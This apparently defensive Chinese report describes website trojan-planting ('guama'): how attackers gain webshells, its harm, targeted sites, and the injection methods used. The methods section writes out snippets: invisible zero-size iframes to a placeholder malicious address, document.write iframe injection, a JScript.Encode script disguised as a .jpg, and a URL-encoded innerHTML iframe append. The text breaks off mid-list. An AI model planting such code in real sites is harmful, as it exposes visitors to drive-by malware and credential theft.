网站挂马及检测技术.pdfVIP

网站挂马与检测技术报告 什么是挂马？ 所谓的挂马，就是黑客通过各种手段，包括 SQL 注入，网站敏感 文件扫描，服务器漏洞，网站程序 0day, 等各种方法获得账号，然后 登陆网站，通过数据库 备份/恢复 或者上传漏洞获得一个 webshell 。 利用获得的 webshell 修改网站页面的内容，向页面中加入恶意转向代 码。也可以直接通过获得服务器或者网站 FTP，然后直接对网站页面 直接进行修改。当你访问被加入的页面 ，你就会自动的访问被转向 的地址或者下载木马病毒。 网站挂马的危害 危害和应用的普及程度有关，上网人人都会，也就是说，人人都 可能中毒。据金山毒霸安全实验室统计，每天有数百万次浏览与挂马 网页有关，中毒概率在 20%-50%之间。 很多游戏网站被挂马，黑客目的就是盗取浏览该网站玩家的游戏 账号，而那些大型网站被挂马，则是为了搜集大量的。网站被挂马不 仅会让自己的网站失去信誉，丢失大量客户，也会让我们这些普通用 户陷入黑客设下的陷阱，沦为黑客的肉鸡。　　 如果不小心进入了已被挂马的网站，则会感染病毒，以致丢失大 量的宝贵文件资料和账号密码，其危害极大。 挂马泛滥的原因 利。病毒木马黑色产业链有丰厚的利润，去年南京警方抓获的大 小姐系列木马案，犯罪集团3 个月获得非常收益 3000 万。网络应用越 普及，黑色产业链的从业者收益也就越高。 挂马范围 哪些网站容易被挂马呢？越是流量高的网站对黑客越有吸引力， 黑客攻破一个管理上有漏洞并且网站流量很高的网站，一天就可以感 染数百万人。那些与公共事业密切相关的网站，比如政府机关的网站， 色情网站，视频网站，聊天交友网站，提供盗版软件破解工具的网站 最容易被入侵，几乎每周出现的热点网络事件都被攻击者利用，网民 一不小心就会受热门事件吸引中招。 网站挂马的常见方式 1.框架挂马 iframe src=地址 width=0 height=0/iframe 其中“地址”处可以输入恶意网站链接等。 属性为 0 意味着该框架是不可见的，受害者若不查看源代码很难 发现网页木马。这个方法也是挂马最常用的一段代码，但是随着网站 管理员和广大网民安全意识的提高，只要在源代码中搜索iframe 这个 关键字，就很容易找到网页木马的源头。 2.js 文件挂马 只要是 JS 文件，都可以通过被恶意修改从而被挂上恶意代码，一 般被全站引用的 JS 代码最容易被挂木马，检测我们可以查看 JS 代码 的左边或下边，坏人很喜欢将恶意代码与正常代码间用很多空格或回 车来进行隐藏，所以要多看看 JS 代码页面有没有被故意拉长等。 相 比 iframe 这 个 标 签 ， SCRIPT src=http://xx.js type=text/javascript这段代码就显得更加隐蔽，因为几乎 95%的网页 中都会出现类似的 script 标签。利用js 引入网页木马也有多种方法： 在 js 中直接写出框架网页木马 示例代码如下： document.write(iframe width=0 height=0 src=网 页木 马地址 /iframe) ； 指定 language 的属性为JScript.Encode 还可以引入其他扩展名的 js 代码，这样就更加具有迷惑性，示例 代码如下： SCRIPT language=JScript.Encode src=http://www. /mm.jpg/script ； 利用 js 更改 body 的 innerHTML 属性，引入网页木马 如果对内容进行编码的话，不但能绕过杀毒软件的检测，而且增 加了解密的难度，示例代码如下： op.document.body.innerHTML=top.document.body.innerHTML+\r\ n iframe src=http://网页木马地址/%22%3E%3C/iframe%3E ； 利用 JavaScript 的 window.open 方法打开